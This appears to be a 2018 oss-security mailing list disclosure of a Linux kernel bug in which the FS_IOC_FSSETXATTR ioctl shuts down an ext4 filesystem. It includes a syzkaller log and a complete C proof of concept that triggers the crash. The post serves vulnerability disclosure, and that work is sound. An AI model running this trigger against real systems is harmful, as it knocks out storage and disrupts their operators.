oss-security - Linux kernel: FS_IOC_FSSETXATTR will lead to EXT4-fs shut down

Follow @Openwall on Twitter for new release announcements and other news

[<prev] [next>] [thread-next>] [day] [month] [year] [list]

Date: Tue, 28 Aug 2018 08:27:50 +0000
From: zhrzhang(张洪睿) <zhrzhang@...cent.com>
To: oss-security <oss-security@...ts.openwall.com>
Subject: Linux kernel: FS_IOC_FSSETXATTR will lead to EXT4-fs shut down

Hello：
        when I fuzz，I found the kernel will always no output from machine, and error FS_IOC_FSSETXATTR contribute to this.

        the syzlog is as below:

r0 = creat(&(0x7f0000000140)='./file0\x00', 0x0)
ioctl$FS_IOC_FSSETXATTR(r0, 0x8004587d, &(0x7f0000000080)={0x0, 0x0, 0x0, 0x8})

        the poc will show like this:

#define _GNU_SOURCE

#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

uint64_t r[1] = {0xffffffffffffffff};

int main(void)
{
syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
long res = 0;
memcpy((void*)0x20000140, "./file0", 8);
res = syscall(__NR_creat, 0x20000140, 0);
if (res != -1)
r[0] = res;
*(uint32_t*)0x20000080 = 0;
*(uint32_t*)0x20000084 = 0;
*(uint32_t*)0x20000088 = 0;
*(uint32_t*)0x2000008c = 8;
*(uint32_t*)0x20000090 = 0;
*(uint64_t*)0x20000098 = 0;
syscall(__NR_ioctl, r[0], 0x8004587d, 0x20000080);
return 0;
}
________________________________
zhrzhang(张洪睿)

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.